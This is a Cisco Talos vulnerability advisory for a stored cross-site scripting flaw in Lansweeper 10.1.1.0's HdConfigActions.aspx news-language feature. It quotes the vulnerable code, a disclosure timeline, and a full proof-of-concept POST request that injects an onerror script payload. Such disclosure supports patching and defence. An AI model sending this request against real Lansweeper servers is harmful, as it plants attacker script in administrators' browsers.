Talos Vulnerability Report

TALOS-2022-1532

Lansweeper lansweeper HdConfigActions.aspx altertextlanguages stored cross-site scripting vulnerability

December 1, 2022
CVE Number

CVE-2022-28703

SUMMARY

A stored cross-site scripting vulnerability exists in the HdConfigActions.aspx altertextlanguages functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

PRODUCT URLS

lansweeper - https://www.lansweeper.com/

CVSSv3 SCORE

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

DETAILS

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable stored xss vulnerability is related with an action: Configuration -> News page->Alter language data choose any language other than english. Vulnerable code is located inside the \LS\CF\HdConfigActions.cs file. Let us take a close look at the vulnerable source code :

Line 1 	int newsID = int.Parse(current.Request["id"]);
Line 2 	string reqType = current.Request["type"];
Line 3 	(...)
Line 4 		case "news":		
Line 5 			delteSQL  = "DELETE FROM htblnewsLang WHERE newsid = @p1";
Line 6 			insertSQL = "INSERT htblnewsLang (newsid, [language], description, [text]) VALUES (@p1,@p2,@p3,@p4)";		
Line 7 			break;
Line 8 		(...)
Line 9 		DB.ExecuteNonQuery(delteSQL, DB.NewDBParameter("@p1", newsID));
Line 10		foreach (Language langID in Enum.GetValues(typeof(Language)))
Line 11		{
Line 12			if (langID != Language.Eng)
Line 13			{
Line 14				DB.ExecuteNonQuery(insertSQL, DB.NewDBParameter("@p1", newsID), DB.NewDBParameter("@p2", (int)langID), DB.NewDBParameter("@p3", current.Request["lang" + (int)langID] ?? ""), DB.NewDBParameter("@p4", array[(int)(langID - 1)]), DB.NewDBParameter("@p5", (reqType == "news") ? HtmlSanitizer.SanitizeHtml(dictionary2[langID]) : dictionary2[langID]));
Line 15			}
Line 16		}

where part of the request looks like this : REQUEST

POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
(...)
POST DATA:
lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>	

During the news alter operation, there is a special insert sql query for languages other than english line 12. As you might notice, none of the passed news parameters is sanitized before insertion to the database:

description  - lang24=xss_entry
news tesxt   - lang24x=<img src=1 onerror=alert(1)>

There is an attempt at sanitization made for paramter 5, but news insert query has just 4 values. News text does not seem to be sanitize during output either. Injected code will be automatically triggered each time when a user attempts to edit this news.

Exploit Proof of Concept

REQUEST

POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 837
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/configuration/MainPage/
Cookie: UserSettings=language=24; ASP.NET_SessionId=s3bal3hgmqgscqihm3vxj5gt; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5 0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=

__VIEWSTATE=&lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>&lang30=Magic&lang30x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&lang34=Magic&lang34x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&id=3&type=news&undefined=undefined&chksm=6740673596&__RequestVerificationToken=LCEp+vTDGHE23M5WuFdmjkRUlRS/DSdWiI/M7gs3RxuLXvxiMI9MiWihGndb3j1GaSLAhRww0iwriAEMcPmF4AzPEN50y2dmrSH3dUNVM+n0PtKlrw8vFGFigInLwkFYebmGC/fbz0Lo2lx7Myi0Ce2huzL/7QsGyGsj4We5WVg=

RESPONSE

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 03 Jun 2022 09:01:34 GMT
Connection: close
Content-Length: 167

{"ErrorType":"","Error":false,"Emsg":"","AddedRows":[["eng_new","",""]],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
TIMELINE

2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.